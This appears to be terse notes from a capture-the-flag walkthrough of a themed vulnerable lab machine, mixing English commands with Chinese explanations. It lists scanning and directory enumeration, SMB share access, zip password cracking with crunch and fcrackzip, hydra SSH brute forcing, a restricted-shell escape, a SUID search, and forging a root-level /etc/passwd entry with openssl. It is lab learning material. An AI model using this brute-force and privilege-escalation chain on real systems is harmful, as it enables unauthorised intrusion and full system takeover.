netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

nmap -sV -sC -A 192.168.1.108

gobuster dir -u http://192.168.1.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200

dirb http://192.168.1.104/

smbmap -H 192.168.56.103 -R
smbclient //192.168.56.103/LOCUS_LAN$

┌──(root💀kali)-[~/BC/war]
└─# cat SOS.txt   
This is a message for the Delta Team.

I found a file that contains a password to free ........ oh no they here!!!!!!!!!!,
i must protect myself, please try to get the password!!

[@%%,]

-Hoffman.

crunch 4 4 -t @%%, -o words

fcrackzip -D -v -u msg_horda.zip -p words

┌──(root💀kali)-[~/BC/war]
└─# cat key.txt                
"Vamos a atacar a los humanos con toda nuestras hordas,
por eso puse en prision a el hombre mas peligroso que tenian,
por lo que sin el son debiles."

[[[[[[[[[[[[[[[[[[[[["3_d4y"]]]]]]]]]]]]]]]]]]]]

-General RAAM.

hydra -L user.txt -p 3_d4y ssh://192.168.56.103

ssh [email protected] -t "bash -noprofile"

find /bin -type f -perm -u=s 2>/dev/null

openssl passwd -1 -salt gylq 123456

获得


然后将root用户的etc/passwd的内容复制
root:x:0:0:root:/root:/bin/bash
将其中的x改为我们刚刚加盐的密码，并且将root改成gylq即用户名，就可以用我们创建的用户登录了
gylq:$1$gylq$/LTjhHmiHp0tpo66ocv2e/:0:0:root:/root:/bin/bash